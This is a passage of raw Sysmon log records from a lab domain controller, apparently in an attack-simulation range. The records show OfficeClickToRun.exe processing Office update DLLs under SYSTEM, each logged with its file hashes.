Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\atl100.dllMD5=5A55E3E6F53592F8170623DEFA2B7954,SHA256=B524543192E78A2C97D3EC9AA0CFCBBAA308439D3A33F9A1F4EDFBD3181D7919,IMPHASH=AA9299515F154AF30B53DE8ACB647CC4truetrue 23542300x800000000000000071587Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.766{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Mozilla Firefox\plugins\npMeetingJoinPluginOC.dllMD5=9CADDA79DDEA0ABD0AD0BFCA663F2F3C,SHA256=CA2081E9C01FA060F73E91D642A03054A32F7C97B4F2FD2AA13666794A32BE04,IMPHASH=D03C3B1A366B52733F0A6088900430B5truetrue 23542300x800000000000000071586Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.766{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft.NET\ADOMD.NET\130\Microsoft.AnalysisServices.AdomdClient.dllMD5=1A81C7043AA312CF200D328F80E88E71,SHA256=876B1264F93F8CB317F8657707821F089C2857910B2B3F9A750BD12775C66485,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071585Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft SQL Server\130\Shared\msasxpress.dllMD5=F6D50401DE38580B6EF3389F4D52DBBA,SHA256=61D4D0C58692702481C29CADAA4E355CAD6795D4368507AA97C508FE28857128,IMPHASH=E953DEED71CBC9D0E43DF95B11D01357truetrue 23542300x800000000000000071584Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\VVIEWER.DLLMD5=4DEF0CADEFC7D243E2F56022BDDEDCD8,SHA256=7DCB5FA9537D02F365440996524617486DE9FDE6A337A649B494C205F8B1CF8D,IMPHASH=F1F2A17D038A1F019E3B7B2F6D50AF9Ctruetrue 23542300x800000000000000071583Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\VVIEWDWG.DLLMD5=AC7EBF3F0C2C90E466E3789C973D7E62,SHA256=F0C81638F8B0E62810510D6B61AAE2150D3209DFF76E11DB1616A4E2D60B272D,IMPHASH=4B07561039AD0BFC041DBF3C30BC3AD8truetrue 23542300x800000000000000071582Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\vcruntime140.dllMD5=E51018E4985943C51FF91471F8906504,SHA256=FF9C1123CFF493A8F5EACB91115611B6C1C808B30C82AF9B6F388C0EF1F6B46D,IMPHASH=DBF59B100B5A77256457CF057352B441truetrue 23542300x800000000000000071581Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.532{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\vccorlib140.dllMD5=E88E2BF24A4D846C7F8E313D75EED528,SHA256=2F7E17BC746ABF55122EE1D2608DB7240DE4B4428BE13DFEE8C3E03DB6F9B360,IMPHASH=E2C243EAA5D873A145FCEF834080DE02truetrue 23542300x800000000000000071580Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.532{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\URLREDIR.DLLMD5=C55062540000C23195D96127954EE6DE,SHA256=21A7ED199012378E47000AB37356EC9C215A6E9FD63E7C171CD5D12C55E917FD,IMPHASH=2BEE7F4970E754DDA247C3F958B125EBtruetrue 23542300x800000000000000071579Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.516{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\ucrtbase.dllMD5=3E0303F978818E5C944F5485792696FD,SHA256=7041885B2A8300BF12A46510228CE8D103D74E83B1BAF696B84FF3E5AB785DD1,IMPHASH=71F1D8A10F840FFEE6964317E974D463truetrue 23542300x800000000000000071578Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\STSUPLD.DLLMD5=66623E8736C33EC3EC2BC356971E7967,SHA256=DA574C24FE810D840BA638D218438786119D730516A1A6023381BC55E970410E,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071577Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\STSCOPY.DLLMD5=0645BD87A28DB9C1D907C425BF8E1170,SHA256=DFC76B4FA633189C7AEBE61D497A3C550BE5A2CA4D8A2DC74351C55B872AFF76,IMPHASH=B6B5C8AE7CCA1F814E55714911A89DDAtruetrue 23542300x800000000000000071576Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\PPSLAX.DLLMD5=A4415A6CFE5EDCB71E51E5B08BCEE871,SHA256=97DA76F6BF3AC2590ACAA46046DD94DF24F4D3FB096280290BA178887BDB0353,IMPHASH=2071708FCB41EB3F3CBC8FB436FC4299truetrue 23542300x800000000000000071575Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\OWSSUPP.DLLMD5=EDA245BF838D3E19CD15B4A53526DE37,SHA256=7E7A6E6DCFC1F9473EE4A6704D4D162EBAF49863FC6E3384640BF7CBFD3A0B23,IMPHASH=787A9CF5CAB2A811E15CBF9843C24307truetrue 23542300x800000000000000071574Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\OWSCLT.DLLMD5=CDFC992B98D346F32DC9311C5DCD5AB0,SHA256=49C82A87D66C81E952C98C5FD537905390BE2289FC2BB9B365E726D56391049D,IMPHASH=8915A784A90C84884C7F65CE16396B2Dtruetrue 23542300x800000000000000071573Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.469{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\OSFROAMINGPROXY.DLLMD5=30EAA0E85271FA15946017F1119BD821,SHA256=3AFAA90A80F17C2040723274D648A88F2DD75AF6D08A5D870541801A142DE13D,IMPHASH=9D64FDE11CB3545F9E40FF8F9A0F95F5truetrue 23542300x800000000000000071572Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.469{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\OSFPROXY.DLLMD5=F075625FEF2C3D32E2EBFF8BB6CE5483,SHA256=EE25C24BF6E8BFAC1D08B658D90064DF5C907D42888CAA150D22400300D64104,IMPHASH=9D64FDE11CB3545F9E40FF8F9A0F95F5truetrue 23542300x800000000000000071571Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.469{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\ONLNTCOMLIB.DLLMD5=1264F2FE941EF7EA9197EB8BA24B5D15,SHA256=6C475C3F46F2CAC21CC197B1CD81D94974797DA23B95A3BAAB1CAABF682B0FCD,IMPHASH=8489B18682AA2AEDA3E72E4C548B2678truetrue 23542300x800000000000000071570Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.469{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\ONBttnIELinkedNotes.dllMD5=C435C00F425C20E5F15C43C0A958B11E,SHA256=7186A90041F7FE6A94586AD5B66AC9BEB0A4AF34AA1A1BB2EC2174C6C0A9B0BD,IMPHASH=1572580F603B1A1FBDBE5FC4BE733C06truetrue 23542300x800000000000000071569Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\ONBttnIE.dllMD5=04C50A882FF56CE83D21F3DD464A922A,SHA256=F059D652CC0383F22EC4B059B209B7F7C467257D6B06A9B8F7F7583D216FCD80,IMPHASH=FCAA605923C5C65BD1CC5D653129DFADtruetrue 23542300x800000000000000071568Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\OLKFSTUB.DLLMD5=1B4C76EC4F60736067279199800FAFA4,SHA256=746F552786C868E10F0676AA806C823C4CFABF3BC4F69A5F1C32C1EE08E7BFD5,IMPHASH=C3C60B1461928D1A5BEB3D2096B56026truetrue 23542300x800000000000000071567Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.438{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dllMD5=FBF4E7FD9E7FF6A5611AC1B8C6DEE3F2,SHA256=DA5A1A9BDA45AE8118F6F08620F81E110FCB06412F12E6F769003C2BA36505BB,IMPHASH=9664C44AAE2E9867559BF8F8F2D30B90truetrue 23542300x800000000000000071566Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.438{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLLMD5=574F19ABB89DF3C126E2ACD0CCB5252C,SHA256=888954D2523D934252141C4262A3201B735AABD6FE425300836EA81395B398E5,IMPHASH=E7C50014255E607796325C45C4D7079Atruetrue 23542300x800000000000000071565Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.438{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\NAMEEXT.DLLMD5=BBEB61000456A854E5E25E62B77C2CB0,SHA256=BC22134300FDA963F50A5865B81C259B4935E53804E9EB6DA0BBD8D2AAAA53CD,IMPHASH=C310A60A4DC7DDF02F718E66FC28CC48truetrue 23542300x800000000000000071564Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\NAMECONTROLPROXY.DLLMD5=63FEC8CEBA6E3F1E308CA48C110682EF,SHA256=69C6CE00ED9344F32098C097D5CDAB778EFC835808108440E195AC98DE39B58A,IMPHASH=1CFB7F013E01DEE64A2AE8065944157Atruetrue 23542300x800000000000000071563Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\NAME.DLLMD5=598EDAD4E890F3CE8CE739453D55CBA0,SHA256=B075C00DB4AAB473BB3249142CD6302F8511290134EB8780795912FBF99383F9,IMPHASH=618B686D107528DF01F139E2367E009Btruetrue 23542300x800000000000000071562Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\msvcr120.dllMD5=1A22AC29230FF06E278CF85992F48C86,SHA256=3A3F61F1D187142BBA9B37B318F6052A09743FF24FCDB3CEE478D1BC5C68D300,IMPHASH=AA8D086DEB6960B10F8791DF466A5610truetrue 23542300x800000000000000071561Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.407{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\msvcp140.dllMD5=5FD0772C30A923159055E87395F96D86,SHA256=02C7259456EAC8CBADFB460377BA68E98282400C7A4A9D0BF49B3313EF6D554D,IMPHASH=F2D585FF96AFA3A77E09F5B37E7B3230truetrue 23542300x800000000000000071560Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.407{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\msvcp120.dllMD5=E3244FDCEC84C99E4B60227EB3B70893,SHA256=81FBC2824E73F0D101D91854694A52E79DB0FFAADBB2A10DEAAF47B3B7F9B2B0,IMPHASH=6CCDA270A497A2C5A36A7F385CC9910Dtruetrue 23542300x800000000000000071559Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.391{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLLMD5=E5602DC816A6E4C771E5915510CBF8AA,SHA256=8A3CB379A658271F508D6C547842BC5772A0679FBC2B7216845AD7CCD840E4A7,IMPHASH=CCEABD495405B9F6CD1EB9CD2FCC24E1truetrue 23542300x800000000000000071558Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.391{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\MSOHTMED.EXEMD5=92970E31E5541B54F3DDDA54D8C2D59B,SHA256=45A7472E11C42241E1FDAC6E75FD95E63132FFF73A73C22D3B265BC69D18A62B,IMPHASH=DF05A8E4380ADFC29458E007D54613A1truetrue 23542300x800000000000000071557Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\MSOHEV.DLLMD5=DCB5920ADD47C828B5493B1EF9B5FF8E,SHA256=591074C6A47D5D9F91C7F2EE84C4727E2FFD3D903CE32F1B3EF4DD1F1F998483,IMPHASH=5E4F727E3327506553F3BDEE1BDA9F44truetrue 23542300x800000000000000071556Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\MINSBROAMINGPROXY.DLLMD5=097A2643EED30FA17CF20C6A11BFA070,SHA256=82DCA726FFFB98187634F74CFAB67C459E3C191C29B47AEB842EA0D105F6F29A,IMPHASH=9D64FDE11CB3545F9E40FF8F9A0F95F5truetrue 23542300x800000000000000071555Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\MINSBPROXY.DLLMD5=C6080CBFAADB66594BF9F0752F723018,SHA256=C5D7C56713FC96C7899C8E0BB7ACB738B56EB23197AD2BA48F806761AF661A30,IMPHASH=9D64FDE11CB3545F9E40FF8F9A0F95F5truetrue 23542300x800000000000000071554Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\mfc140u.dllMD5=F8EBBB4C28AB643471B124701DA5B71A,SHA256=DF8543E39C6C04440734A26B25A8ADB34460D4AD08FD41E2468F067F1284E582,IMPHASH=C2C401022BB95036E7638802C8DA49BDtruetrue 23542300x800000000000000071553Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.313{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\MeetingJoinAxOC.dllMD5=A71103C60FEC7FDC8DA7AD5912A7BDF2,SHA256=2E85A37B3080237FF910CF9048402F6B057B4781CABDF417CB2CF7CC83B6D219,IMPHASH=5248AB300DD55AB26C77CAD693EC6653truetrue 23542300x800000000000000071552Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\JitV.dllMD5=34ED9670E03E04C870C1CF4E390791DD,SHA256=FDD4CA0FC68DEB7C9E6C59229A628EA2A4767345B1B5E3F8B2C9D25B0C6314CF,IMPHASH=EA95731F810B655B192990CB485E2CD7truetrue 23542300x800000000000000071551Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\Interceptor.tlbMD5=6A7C801B60F14C6CA60F6F011728AE16,SHA256=B25F724A577896632581DDC8EE69A1809E861C7E1F4450C93D03521193495BD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071550Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\Interceptor.dllMD5=99E16CB656954CC8413A432C87D30497,SHA256=FFAD4B598B0C2423EB55AB869526D0459B536E99EFD6479451C80991960BB1C4,IMPHASH=FCA7F964194B175FC327A508ADC9F1D1truetrue 23542300x800000000000000071549Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.282{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\IEAWSDC.DLLMD5=BBDB0C1D39D64BFC5E33774375D48EB6,SHA256=F0F35212E0136C06417CEC9D25FD6BD2E17548141D221A67A18E25F45AF30C9A,IMPHASH=E9259B6EE545ED1A4DB2255C5B55CD04truetrue 23542300x800000000000000071548Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.282{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\GROOVEEX.DLLMD5=8D7991FB15A238AB88137EA9AF73EC1C,SHA256=8B75D171CE761E5329E5CE7D90BB24BDD0A3C1AC8911A54304A8CC5AD671E196,IMPHASH=2EA6E3D7EB87AB59A4812CC2B5F8CABBtruetrue 23542300x800000000000000071547Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.251{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\concrt140.dllMD5=773091E3923378F9B529CDA45E32C489,SHA256=6CC8FA5CE54B2B8C99E22A0E37179EBA9D418568D142AC58FAD52DD28E867A17,IMPHASH=720042EA97BFDE1DFC328C5715BE448Dtruetrue 23542300x800000000000000071546Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.251{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT 